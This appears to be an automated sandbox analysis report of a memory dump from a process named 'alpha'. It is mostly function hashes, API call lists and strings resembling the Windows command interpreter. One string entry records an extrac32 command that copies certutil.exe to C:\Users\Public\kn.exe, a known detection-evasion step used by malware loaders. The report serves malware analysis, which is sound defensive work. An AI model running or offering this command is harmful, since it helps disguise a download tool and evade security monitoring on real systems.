                                                      • Opcode ID: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                      • Instruction ID: a7cf7be8739ac7de15cf8f925d1d9c60d38a91820f3fd2e4c7bf818822b40413
                                                      • Opcode Fuzzy Hash: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                      • Instruction Fuzzy Hash: 25917376A08642A7E724EF25A402679F7E1FB89B85FC48136DA4E43794DFBCE440CB11
                                                      APIs
                                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7E1DD7251), ref: 00007FF7E1DD628E
                                                      Similarity
                                                      • API ID: ObjectSingleWait
                                                      • String ID: wil
                                                      • API String ID: 24740636-1589926490
                                                      • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                      • Instruction ID: d9b4ed31722e88786d684c2bba737dde0e40d30a2e71c38c5cb31365cac5cc94
                                                      • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                      • Instruction Fuzzy Hash: EE416531A0C54283F320EB15E84237DEAA1EF85781FD48232D529C66D4DFBDE8458762
                                                      Similarity
                                                      • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                      • String ID: $Application$System
                                                      • API String ID: 3377411628-1881496484
                                                      • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                      • Instruction ID: 2002774bb429e8042910102ddf55a255d30db9b1c31304c6f2880f367866ebe7
                                                      • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                      • Instruction Fuzzy Hash: 5E419D32B08B429AE714EB60E4413EDB7A5FB89749F84523ADA0E42B58EF7CD105C750
                                                      Similarity
                                                      • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                      • String ID: :$\
                                                      • API String ID: 3961617410-1166558509
                                                      • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                      • Instruction ID: 40261a37ac5a28dfa1efb47d7dc31af5b5a233b4abae9a3bb88bdc197873f588
                                                      • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                      • Instruction Fuzzy Hash: F421BA21E0864296E714EB60B446679F7E1FF89751BC88536D91F83390DFBCE444C622
                                                      Similarity
                                                      • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                      • String ID:
                                                      • API String ID: 1397130798-0
                                                      • Opcode ID: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                      • Instruction ID: a57081c8e1d308c905f548089beba95f808c653a5985bebefc1e5a8f2ca59585
                                                      • Opcode Fuzzy Hash: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                      • Instruction Fuzzy Hash: C991C522B08B8296EB64EB11D4427B9F3A1FB84B94FC48036DA4E47794EF7CD540C762
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06D6
                                                        • Part of subcall function 00007FF7E1DC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06F0
                                                        • Part of subcall function 00007FF7E1DC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC074D
                                                        • Part of subcall function 00007FF7E1DC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC0762
                                                      • _wcsicmp.MSVCRT ref: 00007FF7E1DC25CA
                                                      • _wcsicmp.MSVCRT ref: 00007FF7E1DC25E8
                                                      • _wcsicmp.MSVCRT ref: 00007FF7E1DC260F
                                                      • _wcsicmp.MSVCRT ref: 00007FF7E1DC2636
                                                      • _wcsicmp.MSVCRT ref: 00007FF7E1DC2650
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      Similarity
                                                      • API ID: _wcsicmp$Heap$AllocProcess
                                                      • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                      • API String ID: 3407644289-1668778490
                                                      • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                      • Instruction ID: f4a0849cc70dc785629f1a2ac7c47863f08e54f95b6dc502b8bf9c9ff0d5551d
                                                      • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                      • Instruction Fuzzy Hash: AA313A21E1860286FB15FF21E812379E694AF84B81FD48837DA4E86295DFBCE401C772
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      Similarity
                                                      • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                      • String ID: &()[]{}^=;!%'+,`~
                                                      • API String ID: 2516562204-381716982
                                                      • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                      • Instruction ID: af7765ab362e43b2b7edcd9374711349ddfbadb440b9dad4e3a49eb61c9658dd
                                                      • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                      • Instruction Fuzzy Hash: CAC1CD32B04A5186E758EB25E8417BEBBA0FB44B95F845136EE8D43B94DF7CE090C711
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD46E
                                                        • Part of subcall function 00007FF7E1DBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD485
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD4EE
                                                        • Part of subcall function 00007FF7E1DBD3F0: iswspace.MSVCRT ref: 00007FF7E1DBD54D
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD569
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD58C
                                                      • iswspace.MSVCRT ref: 00007FF7E1DC7EEE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      Similarity
                                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                                      • String ID: A
                                                      • API String ID: 3731854180-3554254475
                                                      • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                      • Instruction ID: bd1c010b9b388b58595fccc91fe61a4f700d062647ee87abe3602ae295c908d7
                                                      • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                      • Instruction Fuzzy Hash: BFA18D6290968286E724FB21A44237DF6A0FF89791F80C536DA8D47794DFBCE451CB22
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      Similarity
                                                      • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                      • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                      • API String ID: 1580871199-2613899276
                                                      • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                      • Instruction ID: 8fc4939a2ba50e37d1170f2f087fa856e5f5f3314685c41de9e01f4652afadd5
                                                      • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                      • Instruction Fuzzy Hash: 1451B471A18B8282EB10EF15E8017B9B7A4FB88B85F849236DA9E43754DF7CE401C711
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      Similarity
                                                      • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                      • String ID: con
                                                      • API String ID: 689241570-4257191772
                                                      • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                      • Instruction ID: 125f975e53fa3ec9ebf7dd3cbbf08e73f4ec1db8224c81f2a8f49c7588e34925
                                                      • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                      • Instruction Fuzzy Hash: 6441BC32A08A4597E310EB11A44537DBBA0FB89BA1F948336DA2E437D0CFBDD8498751
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      Similarity
                                                      • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                      • String ID: PE
                                                      • API String ID: 2941894976-4258593460
                                                      • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                      • Instruction ID: 19e26c498af3b60797afee8d315afa36401a3064d5bc7bf0ced7d890068d6ffa
                                                      • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                      • Instruction Fuzzy Hash: A4418561A0865186EB24EB11E4123B9F7A0FB89B91F848332DE5D43B95DF7CE445CB21
                                                      APIs
                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7E1DD849D,?,?,?,00007FF7E1DDF0C7), ref: 00007FF7E1DC0045
                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7E1DDF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DC0071
                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC0092
                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7E1DC00A7
                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC0148
                                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7E1DC0181
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      Similarity
                                                      • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                      • String ID:
                                                      • API String ID: 734197835-0
                                                      • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                      • Instruction ID: e0b666f8532200cba8630df44af46a6a906c75f3742f1af43b6f440266643159
                                                      • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                      • Instruction Fuzzy Hash: 7861F535D0CA9686E724EB11A80233DFA91FB85745F848237DD8E83794DFBCA544C792
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      Similarity
                                                      • API ID: Enum$Openwcsrchr
                                                      • String ID: %s=%s$.$\Shell\Open\Command
                                                      • API String ID: 3402383852-1459555574
                                                      • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                      • Instruction ID: 53927a568236833ef1e237450670e4c249fac1d954a8a92c2a8f5b739748fb4a
                                                      • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                      • Instruction Fuzzy Hash: 72A1C761A0964292EF19EB55D0523B9E2A0FF85B90FC44632DA4F477C4DFBDE941C322
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      Similarity
                                                      • API ID: memset$wcscmp
                                                      • String ID: %s
                                                      • API String ID: 243296809-3043279178
                                                      • Opcode ID: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                      • Instruction ID: 2e5331608cf49b331b387461752fd860a29b8f58b3e68a0e05dc695ab059baf2
                                                      • Opcode Fuzzy Hash: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                      • Instruction Fuzzy Hash: 99A1C022B0978696EF35EF21D8423F9A3A0FB48758F904436DA4E4B694EF7CE644C351
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      Similarity
                                                      • API ID: memset$EnvironmentVariable
                                                      • String ID: DIRCMD
                                                      • API String ID: 1405722092-1465291664
                                                      • Opcode ID: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                      • Instruction ID: fd0ecb72b1a001a5b27369fbb0332acee4e32565ba5895a9fb66a6eb90b55d8a
                                                      • Opcode Fuzzy Hash: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                      • Instruction Fuzzy Hash: 4E813C72A14BC18AEB20DF60A8817ED77A4FB88748F90413ADA8D57B58DF78E145C711
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDA6
                                                        • Part of subcall function 00007FF7E1DBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDBD
                                                      • wcschr.MSVCRT(?,?,?,00007FF7E1DB99DD), ref: 00007FF7E1DB9A39
                                                        • Part of subcall function 00007FF7E1DBDF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF7E1DBCEAA), ref: 00007FF7E1DBDFB8
                                                        • Part of subcall function 00007FF7E1DBDF60: RtlFreeHeap.NTDLL ref: 00007FF7E1DBDFCC
                                                        • Part of subcall function 00007FF7E1DBDF60: _setjmp.MSVCRT ref: 00007FF7E1DBE03E
                                                      • wcschr.MSVCRT(?,?,?,00007FF7E1DB99DD), ref: 00007FF7E1DB9AF0
                                                      • wcschr.MSVCRT(?,?,?,00007FF7E1DB99DD), ref: 00007FF7E1DB9B0F
                                                        • Part of subcall function 00007FF7E1DB96E8: memset.MSVCRT ref: 00007FF7E1DB97B2
                                                        • Part of subcall function 00007FF7E1DB96E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7E1DB9880
                                                      • _wcsupr.MSVCRT ref: 00007FF7E1DCB844
                                                      • wcscmp.MSVCRT ref: 00007FF7E1DCB86D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      Similarity
                                                      • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                                      • String ID: FOR$ IF
                                                      • API String ID: 3663254013-2924197646
                                                      APIs
                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF0D6
                                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7E1DBE626,?,?,00000000,00007FF7E1DC1F69), ref: 00007FF7E1DBF1BA
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF1E7
                                                      • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7E1DBE626,?,?,00000000,00007FF7E1DC1F69), ref: 00007FF7E1DBF1FF
                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF2BB
                                                      Strings
                                                      Similarity
                                                      • API ID: iswdigit$iswspacewcschr
                                                      • String ID: )$=,;
                                                      • API String ID: 1959970872-2167043656
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                      • String ID: %04X-%04X$:
                                                      • API String ID: 930873262-1938371929
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                      • API String ID: 3249344982-2616576482
                                                      APIs
                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6A73
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6A91
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6AB0
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6AE3
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6B01
                                                      Strings
                                                      Similarity
                                                      • API ID: wcschr$iswdigit
                                                      • String ID: +-~!$<>+-*/%()|^&=,
                                                      • API String ID: 2770779731-632268628
                                                      APIs
                                                      Similarity
                                                      • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                      • String ID:
                                                      • API String ID: 3192234081-0
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC1673
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC168D
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC1757
                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC176E
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC1788
                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC179C
                                                      Similarity
                                                      • API ID: Heap$Process$Alloc$Size
                                                      • String ID:
                                                      • API String ID: 3586862581-0
                                                      APIs
                                                      Similarity
                                                      • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                      • String ID:
                                                      • API String ID: 1313749407-0
                                                      APIs
                                                      Similarity
                                                      • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                      • String ID:
                                                      • API String ID: 920682188-0
                                                      APIs
                                                      Strings
                                                      • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF7E1DBE00B
                                                      Similarity
                                                      • API ID: Heap$FreeProcess_setjmp
                                                      • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                      • API String ID: 777023205-3344945345
                                                      APIs
                                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7E1DBE626,?,?,00000000,00007FF7E1DC1F69), ref: 00007FF7E1DBF1BA
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF1E7
                                                      • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7E1DBE626,?,?,00000000,00007FF7E1DC1F69), ref: 00007FF7E1DBF1FF
                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF2BB
                                                      Strings
                                                      Similarity
                                                      • API ID: iswdigit$iswspacewcschr
                                                      • String ID: )$=,;
                                                      • API String ID: 1959970872-2167043656
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: _wcsnicmpfprintfwcsrchr
                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                      • API String ID: 3625580822-2781220306
                                                      APIs
                                                      Similarity
                                                      • API ID: memsetwcsspn
                                                      • String ID:
                                                      • API String ID: 3809306610-0
                                                      • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                      • Instruction ID: 90ce8880221803b5071dce55d7de14cc495f08aff95ec84a1fc5879b0cd69bb1
                                                      • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                      • Instruction Fuzzy Hash: E7B1B162A08B5681EB10EF15E452379E7A1FB88B80FC48437DA4E47794DFBCE841C762
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$iswdigit$wcstol
                                                      • String ID:
                                                      • API String ID: 3841054028-0
                                                      • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                      • Instruction ID: 4ed3a6bedc4438e92169f84671751e815ed387384a95442d6079da41c01b9af9
                                                      • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                      • Instruction Fuzzy Hash: 5851D526A0465295EB25EB1998023B9B6A1FFA8751BC4C333DE5D422D4DF7CE4A1C321
                                                      APIs
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DD3687
                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7E1DB260D), ref: 00007FF7E1DD36A6
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7E1DB260D), ref: 00007FF7E1DD36EB
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DD3703
                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7E1DB260D), ref: 00007FF7E1DD3722
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$Write_get_osfhandle$Mode
                                                      • String ID:
                                                      • API String ID: 1066134489-0
                                                      • Opcode ID: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                      • Instruction ID: b0b5e6ca0c9c84154818d49e409d49587f767dd62dc9b7946b37bb0775524492
                                                      • Opcode Fuzzy Hash: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                      • Instruction Fuzzy Hash: B451A6A5B08642B7EB24EF11A40677AE691FF44790F884536DE0E43790DFBCE441CB22
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$DriveErrorInformationLastTypeVolume
                                                      • String ID:
                                                      • API String ID: 850181435-0
                                                      • Opcode ID: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                      • Instruction ID: aed5a1d0e40115584a3ea4acc74fdf75245e7e14bf6fbf7e08957f454d84217e
                                                      • Opcode Fuzzy Hash: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                      • Instruction Fuzzy Hash: E641AE32A08BC1D9E720DF20D8453EAB7A0FB89B85F948436DA4E8BB48CF78D555C711
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC3578: _get_osfhandle.MSVCRT ref: 00007FF7E1DC3584
                                                        • Part of subcall function 00007FF7E1DC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC359C
                                                        • Part of subcall function 00007FF7E1DC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35C3
                                                        • Part of subcall function 00007FF7E1DC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35D9
                                                        • Part of subcall function 00007FF7E1DC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35ED
